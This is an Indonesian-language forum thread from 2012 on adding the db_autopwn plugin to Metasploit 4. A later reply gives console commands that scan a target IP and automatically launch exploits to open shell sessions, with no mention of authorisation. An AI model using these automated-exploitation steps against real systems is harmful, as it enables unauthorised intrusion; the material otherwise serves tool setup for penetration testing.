add db_autopwn di metasploit V4 keatas
#1
Tongue hola para backtrackers selamat malam hahahha di malam yang dingin ini ane mau berbagi sedikit tips yang ane dapetin dari temen ane tentang menambahkan db_autopwn ke metasploit versi 4 keatas.
ok sekaran to do point aje Tongue

Step 1.
Update metasploit anda
Code:
eka@IBTeam[{~}:msfupdate
[Image: 1zq4wmc.png]

Step 2.
Download file rbnya disini Download

Step 3.
Setelah di download Pindah file tersebut kedirectory /opt/metasploit/msf3/plugins

Step 4.
Buka metasploit anda dan load db_autopwn yang anda telah pindah tadi
Code:
eka@IBTeam[{~}:msfconsole

  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+
  


       =[ metasploit v4.2.0-release [core:4.2 api:1.0]
+ -- --=[ 802 exploits - 450 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14791 updated 17 days ago (2012.02.22)

Warning: This copy of the Metasploit Framework was last updated 17 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf >  db_status
[*] postgresql connected to msf3dev
msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf >
[Image: 209koj7.png]

Dan waaaalllllllaaaaaaa db_autopwn anda telah bisa digunakan Tongue Cool

Source : https://www.facebook.com/note.php?note_i...6443660491
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#2
nice share, +1 dari ane Smile

#3
(03-10-2012, 08:52 PM)konspirasi Wrote: nice share, +1 dari ane Smile

Tq om iKOn Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#4
wih Mantep nih om. Smile
An Ordinary Indonesian.

#5
(03-10-2012, 09:16 PM)ariefhikam Wrote: wih Mantep nih om. Smile

silahkan dicoba om ahahahah Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#6
Wink 
wahhh ..
db_autopwn gunanya untuk apa yah om??
soalnya masih awam masalah ginian
hhihihihihi..
Big Grin

#7
(03-17-2012, 03:04 AM)Rudy Bodo Wrote: wahhh ..
db_autopwn gunanya untuk apa yah om??
soalnya masih awam masalah ginian
hhihihihihi..
Big Grin

namanya aja autopwn alias pawning automatically klo di bahasa Indonesia melakukan exploit secara otomatis (klo di msf bisa berdasarkan database vulnerability scanner)

#8
(03-17-2012, 05:14 AM)konspirasi Wrote:
(03-17-2012, 03:04 AM)Rudy Bodo Wrote: wahhh ..
db_autopwn gunanya untuk apa yah om??
soalnya masih awam masalah ginian
hhihihihihi..
Big Grin

namanya aja autopwn alias pawning automatically klo di bahasa Indonesia melakukan exploit secara otomatis (klo di msf bisa berdasarkan database vulnerability scanner)

waahh,,
wajib di coba niih"..
thanks om pencerahannya"..

#9
cara pakenya gimana nih ka???

#10
(03-28-2012, 08:24 PM)yose Wrote: cara pakenya gimana nih ka???

Ok ini caranya:

1. Jalankan Metasploit.
root@bt:~# msfconsole

2. Lakukan serangan.
msf > db_nmap IP_TARGET
msf > db_autopwn -p -t -e
msf > sessions -l
msf > sessions -i 1

atau lihat disini

Sumber : http://www.gilakomputer.net/2011/10/expl...topwn.html Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End






Users browsing this thread: 1 Guest(s)